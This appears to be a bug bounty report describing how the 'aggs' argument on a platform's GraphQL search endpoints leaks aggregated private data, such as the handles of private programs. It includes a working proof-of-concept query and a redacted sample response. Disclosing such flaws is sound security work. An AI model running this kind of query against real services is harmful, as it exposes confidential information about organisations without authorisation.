Summary:
Private information can be exposed using aggs
argument on the search
and opportunities_search
endpoints on the GraphQL root node.
Description:
When using the aggs
argument and return field on the search
and opportunities_search
endpoints, the data returned in the aggs
can potentially contain private information. It can for example be used to expose handles of private programs, and other data that can be aggregated by.
Specific example to expose private team handles, but other things can be exposed in the same way using this or other indexes on the search
endpoint.
# Write your query or mutation here
query {
me {
id
}
opportunities_search(query:{}, aggs:{results:{terms: {field:"handle"}}}) {
aggs
}
}
handle
which are not filtered on whether they are private or not.{
"data": {
"me": null,
"opportunities_search": {
"aggs": {
"results": {
"doc_count_error_upper_bound": 0,
"sum_other_doc_count": 37,
"buckets": [
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
},
{
"key": "private",
"doc_count": 1
}
]
}
}
}
}
}
Impact depends on what information is stored in which index, and which fields can be aggregated by. In the current situation at least allows to expose asset information, handles and other information of teams you donβt have access to.